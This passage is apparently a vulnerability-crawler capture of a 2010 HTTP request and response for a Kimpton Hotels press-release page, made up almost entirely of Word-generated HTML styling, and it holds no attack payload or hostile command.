mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l1:level3 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l4:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:806508694; mso-list-type:hybrid; mso-list-template-ids:-2137327588 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l7 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l7:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l10 {mso-list-id:1566069662; mso-list-type:hybrid; mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}@list l10:level1 {mso-level-number-format:bullet; mso-level-text:\F0FC; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l11 {mso-list-id:1636525908; mso-list-type:hybrid; mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l11:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:none; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l12 {mso-list-id:1765494741; mso-list-type:hybrid; mso-list-template-ids:-1093994450 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l12:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}ol {margin-bottom:0in;}ul {margi..
- /pdfs/press/html/Free-Spree-0710/index.html

/pdfs/press/html/Free-Spree-0710/index.html

http://www.kimptonhotels.com/pdfs/press/html/Free-Spree-0710/index.html

Request

GET /pdfs/press/html/Free-Spree-0710/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:08:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 32032
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40"><head><meta name=Title content=" "><meta name=Keywords content=""><meta http-equiv=Content-Type content="text/html; charset=macintosh"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 2008"><meta name=Originator content="Microsoft Word 2008"><link rel=File-List href="images/filelist.xml"><link rel=Edit-Time-Data href="images/editdata.mso"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author> </o:Author> <o:Template>Normal.dotm</o:Template> <o:LastAuthor>Marie Chen</o:LastAuthor> <o:Revision>2</o:Revision> <o:TotalTime>3</o:TotalTime> <o:LastPrinted>2010-07-12T16:49:00Z</o:LastPrinted> <o:Created>2010-07-12T16:50:00Z</o:Created> <o:LastSaved>2010-07-12T16:50:00Z</o:LastSaved> <o:Pages>1</o:Pages> <o:Words>568</o:Words> <o:Characters>3242</o:Characters> <o:Lines>27</o:Lines> <o:Paragraphs>6</o:Paragraphs> <o:CharactersWithSpaces>3981</o:CharactersWithSpaces> <o:Version>12.0</o:Version> </o:DocumentProperties> <o:CustomDocumentProperties> <o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle> </o:CustomDocumentProperties> <o:OfficeDocumentSettings> <o:PixelsPerInch>96</o:PixelsPerInch> <o:TargetScreenSize>800x600</o:TargetScreenSize> </o:OfficeDocumentSettings></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:TrackMoves>false</w:TrackMoves> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:UseNormalStyleForList/> <w:DontUseIndentAsNumberingTabStop/> <w:FELineBreak11/> <w:WW11IndentRules/> <w:DontAutofitConstrainedTables/> <w:AutofitLikeWW11/> <w:HangulWidthLikeWW11/> </w:Compatibility> </w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="276"> </w:LatentStyles></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:Arial; panose-1:2 11 6 4 2 2 2 2 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Courier New"; panose-1:2 7 3 9 2 2 5 2 4 4; mso-font-charset:77; mso-generic-font-family:modern; mso-font-format:other; mso-font-pitch:fixed; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Times; panose-1:2 0 5 0 0 0 0 0 0 0; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Wingdings; panose-1:5 2 1 2 1 8 4 8 7 8; mso-font-charset:2; mso-generic-font-family:auto; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:0 0 65536 0 128 0;}@font-face {font-family:Verdana; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:77; mso-generic-font-family:roman; mso-font-format:other; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:Tahoma; panose-1:2 11 6 4 3 5 4 4 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;}@font-face {font-family:"Arial Unicode MS"; mso-font-charset:128; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:-1 -23 1056964608 0 -16695552 0;}@font-face {font-family:Consolas; panose-1:2 11 6 9 2 2 4 3 2 4; mso-font-charset:0; mso-generic-font-family:auto; mso-font-pitch:variable; mso-font-signature:3 0 0 0 16777216 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}h1 {mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; mso-outline-level:1; font-size:24.0pt; font-family:"Arial Unicode MS"; mso-bidi-font-weight:bold;}h2 {mso-style-next:Normal; margin-top:12.0pt; margin-right:0in; margin-bottom:3.0pt; margin-left:0in; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:14.0pt; font-family:Arial; mso-bidi-font-family:Arial; mso-bidi-font-weight:bold; font-style:italic;}p.MsoCommentText, li.MsoCommentText, div.MsoCommentText {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoHeader, li.MsoHeader, div.MsoHeader {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoFooter, li.MsoFooter, div.MsoFooter {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; tab-stops:center 3.25in right 6.5in; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}span.MsoCommentReference {mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt;}p.MsoBodyText, li.MsoBodyText, div.MsoBodyText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:11.0pt; font-family:Arial; mso-fareast-font-family:Calibri; mso-bidi-font-family:Arial; color:black;}p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; line-height:200%; mso-pagination:widow-orphan; font-size:12.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}p.MsoBodyText3, li.MsoBodyText3, div.MsoBodyText3 {margin-top:0in; margin-right:0in; margin-bottom:6.0pt; margin-left:0in; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times;}a:link, span.MsoHyperlink {color:blue; text-decoration:underline; text-underline:single;}a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline; text-underline:single;}strong {mso-bidi-font-weight:bold;}em {mso-bidi-font-style:italic;}p.MsoPlainText, li.MsoPlainText, div.MsoPlainText {margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.5pt; font-family:"Times New Roman"; mso-ascii-font-family:Consolas; mso-fareast-font-family:Calibri; mso-hansi-font-family:Consolas; mso-bidi-font-family:"Times New Roman";}p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject {mso-style-noshow:yes; mso-style-parent:"Comment Text"; mso-style-next:"Comment Text"; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:Times; mso-fareast-font-family:Calibri; mso-bidi-font-family:Times; font-weight:bold;}p.MsoAcetate, li.MsoAcetate, div.MsoAcetate {mso-style-noshow:yes; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:8.0pt; font-family:Tahoma; mso-fareast-font-family:Calibri; mso-bidi-font-family:Tahoma;}span.CharChar6 {mso-style-name:" Char Char6"; mso-ansi-font-size:24.0pt; mso-bidi-font-size:24.0pt; font-family:"Arial Unicode MS"; mso-ascii-font-family:"Arial Unicode MS"; mso-fareast-font-family:"Arial Unicode MS"; mso-hansi-font-family:"Arial Unicode MS"; mso-bidi-font-family:"Arial Unicode MS"; mso-font-kerning:18.0pt; font-weight:bold;}span.CharChar5 {mso-style-name:" Char Char5"; mso-style-noshow:yes; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:black;}span.CharChar4 {mso-style-name:" Char Char4"; mso-style-noshow:yes; mso-ansi-font-size:8.0pt; mso-bidi-font-size:8.0pt; font-family:Tahoma; mso-ascii-font-family:Tahoma; mso-hansi-font-family:Tahoma; mso-bidi-font-family:Tahoma;}span.CharChar3 {mso-style-name:" Char Char3"; mso-style-noshow:yes; mso-ansi-font-size:10.5pt; mso-bidi-font-size:10.5pt; font-family:Consolas; mso-ascii-font-family:Consolas; mso-hansi-font-family:Consolas;}span.CharChar2 {mso-style-name:" Char Char2"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.kim111 {mso-style-name:kim111;}span.CharChar1 {mso-style-name:" Char Char1"; mso-style-noshow:yes; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.CharChar {mso-style-name:" Char Char"; mso-ansi-font-size:12.0pt; mso-bidi-font-size:12.0pt; font-family:Times; mso-ascii-font-family:Times; mso-hansi-font-family:Times; mso-bidi-font-family:Times;}span.dfs111 {mso-style-name:dfs111; font-family:Verdana; mso-ascii-font-family:Verdana; mso-hansi-font-family:Verdana;}span.emailstyle17 {mso-style-name:emailstyle17; mso-style-noshow:yes; mso-ansi-font-size:10.0pt; mso-bidi-font-size:10.0pt; font-family:Arial; mso-ascii-font-family:Arial; mso-hansi-font-family:Arial; mso-bidi-font-family:Arial; color:windowtext;}span.kim10 {mso-style-name:kim10;} /* Page Definitions */@page {mso-footnote-separator:url(":images:header.htm") fs; mso-footnote-continuation-separator:url(":images:header.htm") fcs; mso-endnote-separator:url(":images:header.htm") es; mso-endnote-continuation-separator:url(":images:header.htm") ecs;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:-1802115189; mso-list-type:hybrid; mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}@list l0:level1 {mso-level-suffix:none; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level2 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level3 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level4 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level5 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level6 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level7 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level8 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l0:level9 {mso-level-start-at:0; mso-level-text:""; mso-level-tab-stop:none; mso-level-number-position:left; margin-left:0in; text-indent:0in;}@list l1 {mso-list-id:1007153; mso-list-type:hybrid; mso-list-template-ids:-1871125328 1670048874 197641 328713 66569 197641 328713 66569 197641 328713;}@list l1:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.25in; mso-level-number-position:left; margin-left:.25in; text-indent:-.25in; mso-ansi-font-size:8.0pt; font-family:Symbol;}@list l1:level3 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Wingdings;}@list l2 {mso-list-id:102651134; mso-list-type:hybrid; mso-list-template-ids:-718892134 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l2:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l3 {mso-list-id:154613679; mso-list-type:hybrid; mso-list-template-ids:-695294530 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l3:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l4 {mso-list-id:533346185; mso-list-type:hybrid; mso-list-template-ids:-2007724532 984073 1639433 1770505 984073 1639433 1770505 984073 1639433 1770505;}@list l4:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5 {mso-list-id:806508694; mso-list-type:hybrid; mso-list-template-ids:-2137327588 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l5:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l5:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l5:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l6 {mso-list-id:973101145; mso-list-type:hybrid; mso-list-template-ids:135307080 197641 197641 328713 66569 197641 328713 66569 197641 328713;}@list l6:level1 {mso-level-number-format:bullet; mso-level-text:o; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:"Courier New"; mso-bidi-font-family:Arial;}@list l7 {mso-list-id:1030841178; mso-list-type:hybrid; mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}@list l7:level1 {mso-level-number-format:bullet; mso-level-text:-; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Arial; mso-fareast-font-family:"Times New Roman"; mso-bidi-font-family:Symbol;}@list l7:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l7:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8 {mso-list-id:1089353841; mso-list-template-ids:-304692582;}@list l8:level1 {mso-level-number-format:bullet; mso-level-text:\F0A7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; mso-ansi-font-size:10.0pt; font-family:Wingdings;}@list l8:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level3 {mso-level-tab-stop:1.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level4 {mso-level-tab-stop:2.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level5 {mso-level-tab-stop:2.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level6 {mso-level-tab-stop:3.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level7 {mso-level-tab-stop:3.5in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level8 {mso-level-tab-stop:4.0in; mso-level-number-position:left; text-indent:-.25in;}@list l8:level9 {mso-level-tab-stop:4.5in; mso-level-number-position:left; text-indent:-.25in;}@list l9 {mso-list-id:1488857345; mso-list-type:hybrid; mso-list-template-ids:-1802839462 66569 197641 328713 66569 197641 328713 66569 197641 328713;}@list l9:level1 {mso-level-number-format:bullet; mso-level-text:\F0B7; mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in; font-family:Symbol;}@list l9:level2 {mso-level-tab-stop:1.0in; mso-level-number-position:left; text-indent:-.25in;}@list l9:level3 